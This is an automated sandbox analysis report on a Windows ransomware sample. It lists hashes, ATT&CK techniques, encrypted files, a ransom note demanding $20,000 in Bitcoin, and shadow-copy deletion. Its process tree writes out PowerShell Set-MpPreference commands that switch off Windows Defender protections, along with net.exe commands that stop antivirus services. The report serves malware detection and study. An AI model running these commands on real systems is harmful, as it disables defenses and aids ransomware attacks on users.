1b8621d6e97ce87a8a5664699d285f417a5a08c40fb658aac9178dc5a6d4826c

Analysis

max time kernel
59s
max time network
152s
platform
windows10_x64
resource
win10v20210408
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
Size

87KB
MD5

3f52b4b4c36af074135666480cd1b65e
SHA1

66d1435061a72556fff47e6676d5531b48f883da
SHA256

4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7
SHA512

d5c9e97d0733c6a938f90b45c236abd2cbb0b756246920c30c2e8e615588237a11e52904a26acc3d1dd7496943060158239b60d2665ba53637bf0df8b2b6b11e

Score

10^/10

evasion persistence ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 9 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe

description	ioc	process
File created	C:\Users\Admin\Pictures\ImportUninstall.tiff.crypted	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
File created	C:\Users\Admin\Pictures\RevokeInitialize.png.crypted	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
File created	C:\Users\Admin\Pictures\StopBackup.png.crypted	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
File created	C:\Users\Admin\Pictures\UseLimit.tiff.crypted	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
File created	C:\Users\Admin\Pictures\CompleteSelect.png.crypted	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\ImportUninstall.tiff	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
File created	C:\Users\Admin\Pictures\MoveResolve.raw.crypted	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\UseLimit.tiff	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
File created	C:\Users\Admin\Pictures\UseUndo.png.crypted	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe

Drops startup file 1 IoCs

Processes:

4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n"	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
5472	vssadmin.exe
5656	vssadmin.exe
5616	vssadmin.exe
4400	vssadmin.exe
4772	vssadmin.exe
5704	vssadmin.exe
6128	vssadmin.exe
4872	vssadmin.exe
4944	vssadmin.exe
5036	vssadmin.exe
5772	vssadmin.exe
6032	vssadmin.exe
2188	vssadmin.exe
4840	vssadmin.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

5224 taskkill.exe
6136 taskkill.exe
5468 taskkill.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2064 PING.EXE

pid	process
5224	taskkill.exe
6136	taskkill.exe
5468	taskkill.exe

pid	process
2064	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe

pid	process
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeIncreaseQuotaPrivilege	2024	powershell.exe
Token: SeSecurityPrivilege	2024	powershell.exe
Token: SeTakeOwnershipPrivilege	2024	powershell.exe
Token: SeLoadDriverPrivilege	2024	powershell.exe
Token: SeSystemProfilePrivilege	2024	powershell.exe
Token: SeSystemtimePrivilege	2024	powershell.exe
Token: SeProfSingleProcessPrivilege	2024	powershell.exe
Token: SeIncBasePriorityPrivilege	2024	powershell.exe
Token: SeCreatePagefilePrivilege	2024	powershell.exe
Token: SeBackupPrivilege	2024	powershell.exe
Token: SeRestorePrivilege	2024	powershell.exe
Token: SeShutdownPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeSystemEnvironmentPrivilege	2024	powershell.exe
Token: SeRemoteShutdownPrivilege	2024	powershell.exe
Token: SeUndockPrivilege	2024	powershell.exe
Token: SeManageVolumePrivilege	2024	powershell.exe
Token: 33	2024	powershell.exe
Token: 34	2024	powershell.exe
Token: 35	2024	powershell.exe
Token: 36	2024	powershell.exe
Token: SeDebugPrivilege	3868	powershell.exe
Token: SeDebugPrivilege	1916	powershell.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	1896	powershell.exe
Token: SeDebugPrivilege	2208	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	2076	powershell.exe
Token: SeDebugPrivilege	992	powershell.exe
Token: SeDebugPrivilege	4184	powershell.exe
Token: SeDebugPrivilege	4324	powershell.exe
Token: SeDebugPrivilege	4484	powershell.exe
Token: SeDebugPrivilege	4640	powershell.exe
Token: SeIncreaseQuotaPrivilege	1916	powershell.exe
Token: SeSecurityPrivilege	1916	powershell.exe
Token: SeTakeOwnershipPrivilege	1916	powershell.exe
Token: SeLoadDriverPrivilege	1916	powershell.exe
Token: SeSystemProfilePrivilege	1916	powershell.exe
Token: SeSystemtimePrivilege	1916	powershell.exe
Token: SeProfSingleProcessPrivilege	1916	powershell.exe
Token: SeIncBasePriorityPrivilege	1916	powershell.exe
Token: SeCreatePagefilePrivilege	1916	powershell.exe
Token: SeBackupPrivilege	1916	powershell.exe
Token: SeRestorePrivilege	1916	powershell.exe
Token: SeShutdownPrivilege	1916	powershell.exe
Token: SeDebugPrivilege	1916	powershell.exe
Token: SeSystemEnvironmentPrivilege	1916	powershell.exe
Token: SeRemoteShutdownPrivilege	1916	powershell.exe
Token: SeUndockPrivilege	1916	powershell.exe
Token: SeManageVolumePrivilege	1916	powershell.exe
Token: 33	1916	powershell.exe
Token: 34	1916	powershell.exe
Token: 35	1916	powershell.exe
Token: 36	1916	powershell.exe
Token: SeIncreaseQuotaPrivilege	2212	powershell.exe
Token: SeSecurityPrivilege	2212	powershell.exe
Token: SeTakeOwnershipPrivilege	2212	powershell.exe
Token: SeLoadDriverPrivilege	2212	powershell.exe
Token: SeSystemProfilePrivilege	2212	powershell.exe
Token: SeSystemtimePrivilege	2212	powershell.exe
Token: SeProfSingleProcessPrivilege	2212	powershell.exe
Token: SeIncBasePriorityPrivilege	2212	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe

pid	process
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe

pid	process
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 644 wrote to memory of 2024	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 2024	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 3868	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 3868	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 1916	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 1916	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 1784	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 1784	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 1896	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 1896	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 2208	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 2208	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 2076	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 2076	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 2212	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 2212	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 992	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 992	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 4184	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 4184	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 4324	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 4324	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 4484	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 4484	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 4640	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 4640	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	powershell.exe
PID 644 wrote to memory of 4736	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 4736	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 4752	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 4752	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 4784	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 4784	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 4824	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 4824	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 4896	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 4896	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 4924	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 4924	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 4972	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 4972	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 5020	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 5020	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 5060	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	cmd.exe
PID 644 wrote to memory of 5060	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	cmd.exe
PID 644 wrote to memory of 5104	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 5104	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 4200	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 4200	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 4736 wrote to memory of 4192	4736	net.exe	net1.exe
PID 4736 wrote to memory of 4192	4736	net.exe	net1.exe
PID 644 wrote to memory of 4376	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 4376	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 4752 wrote to memory of 4760	4752	net.exe	net1.exe
PID 4784 wrote to memory of 4876	4784	net.exe	net1.exe
PID 4752 wrote to memory of 4760	4752	net.exe	net1.exe
PID 4784 wrote to memory of 4876	4784	net.exe	net1.exe
PID 644 wrote to memory of 4960	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 4960	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 3648	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 644 wrote to memory of 3648	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	net.exe
PID 4896 wrote to memory of 4256	4896	net.exe	net1.exe
PID 4896 wrote to memory of 4256	4896	net.exe	net1.exe
PID 4824 wrote to memory of 4228	4824	net.exe	net1.exe
PID 4824 wrote to memory of 4228	4824	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:644
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2208
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2076
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2212
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:992
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4640
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  - Suspicious use of WriteProcessMemory
